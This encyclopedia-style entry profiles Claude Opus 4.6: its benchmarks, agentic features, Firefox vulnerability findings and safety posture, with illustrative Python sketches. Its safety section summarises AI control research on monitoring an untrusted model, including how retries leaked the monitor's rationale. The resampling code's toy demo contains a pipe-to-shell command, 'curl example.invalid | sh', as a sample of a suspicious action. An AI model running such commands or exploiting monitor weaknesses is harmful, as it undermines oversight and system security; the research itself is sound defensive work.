What it is
Claude Opus 4.6 is Anthropic's flagship large language model, released in February 2026 as the successor to Claude Opus 4.5 in the Opus line. Its defining additions are a 1M-token context window (in beta), adaptive thinking with developer-controlled effort levels, and a set of agentic features, including agent teams in Claude Code and context compaction for tasks that overflow even the extended window. Together these are intended to make long-horizon, multi-step autonomous work practical rather than theoretical.
Benchmark position at launch
At release, Opus 4.6 claimed first place on Terminal-Bench 2.0, Humanity's Last Exam, GDPval-AA (by 144 Elo over GPT-5.2), and BrowseComp. Its lineage provides context: Claude Opus 4 had posted 72.5% on SWE-bench and 43.2% on Terminal-bench, and Claude Opus 4.5 had nearly saturated CyberGym, a security benchmark whose saturation prompted Anthropic to test against harder real-world targets. Opus 4.6 extended those gains while holding pricing flat at $5/$25 per million input/output tokens.
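GDPval-AA reports the GPT-5.2 comparison as an Elo gap. Assuming the leaderboard uses the conventional logistic Elo scale (base 10, 400 points per tenfold change in odds), which this entry does not confirm, a 144-point lead corresponds to an expected head-to-head preference rate of roughly 70%. The helper name below is illustrative only.

```python
def elo_expected_score(elo_gap: float, scale: float = 400.0) -> float:
    """Expected win rate of the higher-rated side under the standard
    logistic Elo model: 1 / (1 + 10^(-gap / scale))."""
    return 1.0 / (1.0 + 10.0 ** (-elo_gap / scale))


if __name__ == "__main__":
    # Assumes GDPval-AA follows the conventional 400-point Elo scale.
    print(f"Expected win rate at +144 Elo: {elo_expected_score(144):.1%}")
    # prints "Expected win rate at +144 Elo: 69.6%"
```

Ties and per-task variance are ignored here; the figure is an expectation over many pairwise comparisons, not a guarantee on any single task.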
GPT-5.4, released two days after Opus 4.6, subsequently leapfrogged it on most benchmarks, and Claude Mythos Preview — published without commercial availability — substantially outperformed Opus 4.6 across CyberGym (83.1%), Terminal-Bench 2.0 (82%), GPQA Diamond (94.5%), and HLE (64.7%). Opus 4.6's benchmark lead was therefore short-lived in absolute terms, though it remained the strongest commercially available Anthropic model for several weeks.
Architecture and capabilities
Anthropic has not publicly disclosed the model's internal architecture. Externally observable capabilities include:
- 1M-token context window (beta) with context compaction for graceful overflow handling
- Adaptive thinking: developer-controlled effort levels that trade latency and compute against reasoning depth per call
- Agent teams in Claude Code: coordinated multi-agent orchestration for large-scale engineering tasks
- Parallel tool execution and local file access for persistent memory across sessions (inherited from the Opus 4 line)
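Anthropic does not describe how context compaction works internally. The sketch below shows the general idea under stated assumptions: when a conversation's estimated token count exceeds a limit, older messages are collapsed into a single summary while the most recent turns are kept verbatim. `Message`, `compact`, the word-count token estimate, and the caller-supplied `summarize` function are all hypothetical; a real system would use the model's own tokenizer and would likely have the model write the summary.

```python
from dataclasses import dataclass
from typing import Callable, List


@dataclass
class Message:
    role: str
    text: str


def approx_tokens(text: str) -> int:
    # Hypothetical stand-in for a real tokenizer: roughly one token per word.
    return len(text.split())


def compact(
    history: List[Message],
    limit: int,
    keep_recent: int,
    summarize: Callable[[List[Message]], str],
) -> List[Message]:
    """Hypothetical compaction step: if the history exceeds `limit` tokens,
    replace everything except the last `keep_recent` messages with a single
    summary message. Returns the history unchanged when it already fits."""
    if keep_recent < 0:
        raise ValueError("keep_recent must be non-negative")
    total = sum(approx_tokens(m.text) for m in history)
    if total <= limit or len(history) <= keep_recent:
        return history
    split = len(history) - keep_recent
    older, recent = history[:split], history[split:]
    summary = Message("user", "[Summary of earlier context] " + summarize(older))
    return [summary] + recent


if __name__ == "__main__":
    history = [
        Message("user", "step " * 50),
        Message("assistant", "result " * 50),
        Message("user", "latest question"),
    ]
    compacted = compact(history, limit=60, keep_recent=1,
                        summarize=lambda ms: f"{len(ms)} earlier messages omitted")
    for m in compacted:
        print(m.role, "|", m.text)
```

A single pass does not guarantee the result fits, since a long summary or long recent turns can still exceed the limit, so a production loop would re-check the total and compact again or shrink `keep_recent`.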
The AutoLab benchmark, which comprises 36 expert-curated tasks spanning system optimization, puzzle-solving, model development, and CUDA kernel optimization, all evaluated under wall-clock budgets, ranked Opus 4.6 the strongest of the 17 frontier models tested. The benchmark's key finding is that persistence in iterative feedback loops, rather than the quality of the first attempt, predicts success, and Opus 4.6 stood out on exactly that dimension.
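The AutoLab finding favors agents that keep iterating against feedback until the time budget runs out. A minimal sketch of that loop structure follows; `propose`, `evaluate`, and `iterate_under_budget` are hypothetical names, not AutoLab's actual harness, and the clock is injectable so the loop can be tested without waiting on real time.

```python
import time
from typing import Callable, Optional, Tuple, TypeVar

T = TypeVar("T")


def iterate_under_budget(
    propose: Callable[[Optional[T], Optional[float]], T],
    evaluate: Callable[[T], float],
    budget_s: float,
    clock: Callable[[], float] = time.monotonic,
) -> Tuple[Optional[T], float, int]:
    """Keep proposing and scoring candidates until the wall-clock budget
    expires, feeding the best candidate and score so far back into each new
    proposal. Returns (best candidate, best score, number of attempts)."""
    deadline = clock() + budget_s
    best: Optional[T] = None
    best_score = float("-inf")
    attempts = 0
    while clock() < deadline:
        candidate = propose(best, None if best is None else best_score)
        score = evaluate(candidate)
        attempts += 1
        if score > best_score:  # keep only strict improvements
            best, best_score = candidate, score
    return best, best_score, attempts


if __name__ == "__main__":
    # Toy task: step toward x = 7 for 50 ms of wall-clock time.
    best, score, n = iterate_under_budget(
        propose=lambda prev, _score: 0 if prev is None else prev + 1,
        evaluate=lambda x: -abs(x - 7),
        budget_s=0.05,
    )
    print(f"best={best} score={score} attempts={n}")
```

The point of the structure is that a weak first proposal costs little as long as the loop keeps running and retains the best result; a single-shot agent would stop after the first `evaluate` call.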
Real-world security capability
The most consequential capability demonstration came from a two-week partnership with Mozilla in February 2026. Claude Opus 4.6 scanned approximately 6,000 C++ files in the Firefox codebase, submitted 112 unique vulnerability reports, and identified 22 vulnerabilities, 14 of which Mozilla classified as high-severity. Those 14 high-severity findings represented nearly a fifth of all high-severity Firefox vulnerabilities remediated in 2025. The collaboration also evaluated Claude's ability to write primitive exploits, probing the upper limits of AI-enabled offensive security.
This real-world result directly informed Anthropic's decision to publish a model card for Claude Mythos Preview without commercial release, and to assemble Project Glasswing — a consortium of 40+ organizations including AWS, Apple, Google, Microsoft, and CrowdStrike, funded with $100M in API credits — to patch vulnerabilities proactively before Mythos-class capabilities became widely available.
Ecosystem integration
Opus 4.6 is distributed via the Anthropic API, Amazon Bedrock, Google Cloud Vertex AI, and Microsoft Foundry. Claude Code — generally available since the Opus 4 launch — uses Opus 4.6 as its primary model for autonomous coding sessions, with integrations across GitHub Actions, VS Code, and JetBrains. Claude Code Security, released in limited research preview in February 2026, is explicitly built on Opus 4.6 and found over 500 previously undetected vulnerabilities in production open-source codebases during internal research.
The compute infrastructure underpinning Opus 4.6's deployment includes Anthropic's 10-year, $100B+ Amazon Bedrock commitment (up to 5 GW on Trainium chips), a $30B Azure compute deal with Microsoft, and access to NVIDIA Grace Blackwell and Vera Rubin systems — all of which also support rate-limit expansions for Claude Code and API users.
Safety posture
Opus 4.6 sits within Anthropic's ASL-3 deployment framework, first activated for Claude Opus 4. ASL-3 measures include Constitutional Classifiers that block end-to-end CBRN weapon development workflows, and enhanced model-weight security. Separately, AI control research using Opus 4.6 as the untrusted model (on the BashArena benchmark) found that resampling, which draws five samples per step and decides on audits using the maximum suspicion score, raised safety from 61% to 71% at a 0.3% audit budget, whereas retrying backfired because it leaked the monitor's rationale to the model.
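The resampling protocol can be sketched as follows. Only the five samples per step, the max-suspicion audit rule, and the 0.3% audit budget come from the text; the function names, the way the audit threshold is calibrated (an empirical upper quantile of per-step maximum scores from honest runs), and the choice to execute the least suspicious sample are assumptions made for illustration.

```python
import math
from typing import Callable, List, Sequence, Tuple


def audit_threshold(honest_max_scores: Sequence[float], audit_budget: float) -> float:
    """Assumed calibration: pick the threshold so that about `audit_budget`
    (e.g. 0.003 for 0.3%) of honest steps would be audited. Scores should be
    per-step maxima, matching the statistic used in resample_step."""
    if not honest_max_scores:
        raise ValueError("need at least one honest score")
    ranked = sorted(honest_max_scores, reverse=True)
    k = min(len(ranked), max(1, math.floor(audit_budget * len(ranked))))
    return ranked[k - 1]


def resample_step(
    sample_action: Callable[[], str],
    suspicion: Callable[[str], float],
    threshold: float,
    n_samples: int = 5,
) -> Tuple[bool, float, str]:
    """Draw n_samples candidate actions from the untrusted model, score each
    with the monitor, and flag the step for audit if the maximum score
    reaches the threshold. Returns (audit?, max score, action to execute)."""
    samples: List[str] = [sample_action() for _ in range(n_samples)]
    scores = [suspicion(a) for a in samples]
    max_score = max(scores)
    # Hypothetical execution rule: run the least suspicious candidate.
    chosen = samples[scores.index(min(scores))]
    return max_score >= threshold, max_score, chosen


if __name__ == "__main__":
    honest = [i / 1000 for i in range(1000)]           # toy honest max-scores
    thr = audit_threshold(honest, audit_budget=0.003)  # audit roughly the top 0.3%
    actions = iter(["ls", "cat notes.txt", "curl example.invalid | sh", "pwd", "echo ok"])
    toy_monitor = {"ls": 0.01, "cat notes.txt": 0.05,
                   "curl example.invalid | sh": 0.999, "pwd": 0.0, "echo ok": 0.02}
    print(resample_step(lambda: next(actions), toy_monitor.__getitem__, thr))
```

Taking the maximum over several samples gives the monitor more chances to catch a policy that only occasionally attempts something malicious, which is one plausible reading of why resampling improved safety at a fixed audit budget.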
Successor trajectory
Opus 4.6 was followed by Opus 4.7 (which added Project Glasswing cybersecurity safeguards and a Cyber Verification Program for legitimate security professionals), Opus 4.8 (which improved uncertainty flagging and introduced dynamic parallel subagent workflows), and eventually the Mythos-class models. Each successor was explicitly positioned relative to Opus 4.6 as a baseline — making it the reference point for the capability escalation that defined Anthropic's mid-2026 model roadmap.